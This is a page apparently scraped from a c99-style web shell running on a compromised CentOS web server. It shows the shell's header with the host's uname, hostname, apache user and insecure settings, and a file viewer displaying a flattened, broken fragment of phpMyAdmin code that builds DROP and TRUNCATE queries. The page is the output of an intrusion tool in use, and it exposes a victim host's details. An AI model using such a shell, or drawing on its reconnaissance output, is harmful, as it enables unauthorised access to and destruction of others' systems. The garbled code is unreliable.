Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/phpMyAdmin/libraries/ drwxr-xr-x |
Viewing file: Select action/file-type: $sval) { if ($sql_query == '') { $sql_query .= 'SELECT ' . PMA_backquote(urldecode($sval)); } else { $sql_query .= ', ' . PMA_backquote(urldecode($sval)); } } $sql_query .= ' FROM ' . PMA_backquote(htmlspecialchars($table)); require('./sql.php'); break; } } else { $what = 'row_delete'; $selected = $rows_to_delete; } } // end if /** * Displays the confirmation form if required */ if ( !empty($submit_mult) && !empty($what)) { $js_to_run = 'functions.js'; unset($message); if (isset($table) && strlen($table)) { require('./libraries/tbl_properties_common.php'); $url_query .= '&goto=tbl_properties.php&back=tbl_properties.php'; require('./libraries/tbl_properties_table_info.inc.php'); } elseif (isset($db) && strlen($db)) { require('./libraries/db_details_common.inc.php'); require('./libraries/db_details_db_info.inc.php'); } // Builds the query $full_query = ''; if ($what == 'drop_tbl') { $full_query_views = ''; } $selected_cnt = count($selected); $i = 0; foreach ($selected AS $idx => $sval) { switch ($what) { case 'row_delete': $full_query .= htmlspecialchars(urldecode($sval)) . '; '; break; case 'drop_db': $full_query .= 'DROP DATABASE ' . PMA_backquote(htmlspecialchars(urldecode($sval))) . '; '; $reload = 1; break; case 'drop_tbl': $current = urldecode($sval); if (!empty($views) && in_array($current, $views)) { $full_query_views .= (empty($full_query_views) ? 'DROP VIEW ' : ', ') . PMA_backquote(htmlspecialchars($current)); } else { $full_query .= (empty($full_query) ? 'DROP TABLE ' : ', ') . PMA_backquote(htmlspecialchars($current)); } break; case 'empty_tbl': if (PMA_MYSQL_INT_VERSION >= 40000) { $full_query .= 'TRUNCATE '; } else { $full_query .= 'DELETE FROM '; } $full_query .= PMA_backquote(htmlspecialchars(urldecode($sval))) . '; '; break; case 'primary_fld': if ($full_query == '') { $full_query .= 'ALTER TABLE ' . PMA_backquote(htmlspecialchars($table)) . ' DROP PRIMARY KEY,' . ' ADD PRIMARY KEY(' . ' ' . 
PMA_backquote(htmlspecialchars(urldecode($sval))) . ','; } else { $full_query .= ' ' . PMA_backquote(htmlspecialchars(urldecode($sval))) . ','; } if ($i == $selected_cnt-1) { $full_query = preg_replace('@,$@', '); ', $full_query); } break; case 'drop_fld': if ($full_query == '') { $full_query .= 'ALTER TABLE ' . PMA_backquote(htmlspecialchars($table)) . ' DROP ' . PMA_backquote(htmlspecialchars(urldecode($sval))) . ','; } else { $full_query .= ' DROP ' . PMA_backquote(htmlspecialchars(urldecode($sval))) . ','; } if ($i == $selected_cnt-1) { $full_query = preg_replace('@,$@', '; ', $full_query); } break; } // end switch $i++; } if ($what == 'drop_tbl') { if (!empty($full_query)) { $full_query .= '; ' . "\n"; } if (!empty($full_query_views)) { $full_query .= $full_query_views . '; ' . "\n"; } unset($full_query_views); } // Displays the form ?> |
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0049 ]-- |